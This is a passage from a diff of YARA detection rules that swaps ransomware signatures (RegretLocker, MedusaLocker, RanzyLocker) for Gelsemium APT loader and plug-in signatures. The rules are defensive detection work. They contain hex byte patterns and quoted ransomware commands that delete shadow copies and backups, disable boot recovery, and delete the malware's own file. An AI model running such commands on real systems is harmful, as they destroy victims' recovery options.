0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a } + $s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 } condition: - filesize >1KB and 2 of them + uint16(0)==0x5a4d and filesize >6KB and 3 of ($s*) } -rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE { meta: - description = "Detect RegretLocker ransomware" + description = "Detect Gelsevirine malware (Main Plug-in)" author = "Arkbird_SOLG" - id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd" - date = "2020-11-04" - modified = "2020-11-04" - reference = "https://twitter.com/VK_Intel/status/1323693700371914753" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24" + id = "31900186-2531-5558-aafb-67707040ddaf" + date = "2021-06-12" + modified = "2021-06-14" + reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d" + logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf" score = 75 quality = 75 tags = "FILE" - hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4" + hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1" + hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35" + tlp = "white" + adversary = "Gelsemium" strings: - $seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 } - $seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 } - $com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii - $com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 } - $com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii - $com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii - $com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii - $com6 = "schtasks /Delete /TN " fullword ascii - $str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 } - $str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 } - $str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii + $s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 } + $s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 } + $s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 } + $s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 } condition: - uint16(0)==0x5a4d and filesize >200KB and all of ($seq*) and 4 of ($com*) and 2 of ($str*) + uint16(0)==0x5a4d and filesize >300KB and 3 of ($s*) } -rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE { meta: - description = "Detect MedusaLocker ransomware" + description = "Detect Gelsenicine malware (Loader - Variant 2)" author = "Arkbird_SOLG" - id = "7eec35ac-f1ec-596b-8224-ef27e31e841c" - date = "2021-07-25" - modified = "2021-08-08" - reference = "https://twitter.com/r3dbU7z/status/1418433910057353217" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28" + id = "c6e28da2-622b-57ba-9381-9f8f6b8879bf" + date = "2021-06-12" + modified = "2021-06-14" + reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_2.yara#L1-L19" license_url = "N/A" - logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff" + logic_hash = "e1d6402c743af697c8d1b34087b6fe9db80237834d73967b0a0638023d4e4a40" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c" - hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad" - hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc" - hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31" + hash1 = "6eaeca0cf28e74de6cfd82d29a3c3cc30c2bc153ac811692cc41ee290d766474" + hash1 = "d986207bc108e55f4b110ae208656b415d2c5fcc8f99f98b4b3985e82b9d5e5b" + hash1 = "ec491de0e2247f64b753c4ef0c7227ea3548c2f222b547528dae0cf138eca53a" tlp = "white" - adversary = "RaaS" + adversary = "Gelsemium" strings: - $s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d } - $s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b } - $s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 } - $s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 } - $s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide - $s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f } - $s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 } - $s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 } - $s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 } - $s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a } - $x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 } + $s1 = { 48 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 c7 44 24 40 00 00 00 00 8b 05 [3] 00 a8 01 0f 85 96 00 00 00 83 c8 01 89 05 [3] 00 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 48 8d 0d [2] 00 00 e8 [2] 00 00 90 48 c7 43 08 00 00 00 00 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 4c 8d 0d [3] 00 4c 8d 05 [3] 00 33 d2 48 8b cb e8 86 f9 ff ff 48 8b c3 48 83 c4 30 } + $s2 = { 54 00 65 00 6d 00 70 00 2f 00 00 00 00 00 00 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 2f 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2f 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f } + $s3 = { 48 8b ca e8 [3] 00 48 39 5e 08 75 05 48 8b c3 eb 08 48 8b 46 10 48 2b 46 08 3b c3 0f 4c c3 48 63 c8 e8 [3] 00 48 89 47 08 48 8b 56 10 48 8b 4e 08 4c 8b d8 eb 10 4c 3b db 74 05 8a 01 41 88 03 49 ff c3 48 ff c1 48 3b ca 75 eb 4c 89 5f 10 4c 89 5f 18 48 8b c7 48 83 c4 20 5f 5e } + $s4 = { 45 33 c9 45 33 c0 ba 80 00 00 00 48 8b ce e8 16 f2 ff ff 84 c0 74 71 48 8d 53 18 41 b8 20 00 00 00 48 8b ce e8 e4 f4 ff ff 84 c0 74 5b 48 8d 53 38 41 b8 20 00 00 00 48 8b ce e8 56 f9 ff ff 84 c0 74 45 48 8b 43 10 48 8b 0d [3] 00 48 3b c1 74 0d 48 8b d8 48 8b 00 48 3b c1 75 f5 eb 1b 48 8b 43 08 eb 07 48 8b d8 48 8b 40 08 48 3b 58 10 74 f3 48 39 43 10 48 0f } condition: - uint16(0)==0x5A4D and filesize >150KB and 9 of ($s*) and $x1 + uint16(0)==0x5a4d and filesize >30KB and 3 of ($s*) } -rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE { meta: - description = "Detect RanzyLocker ransomware" + description = "Detect Gelsenicine malware (Loader - Variant 1)" author = "Arkbird_SOLG" - id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7" - date = "2021-03-16" - modified = "2021-03-17" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24" + id = "36276150-a5dd-5385-9e50-958a6fa54de5" + date = "2021-06-12" + modified = "2021-06-14" + reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19" license_url = 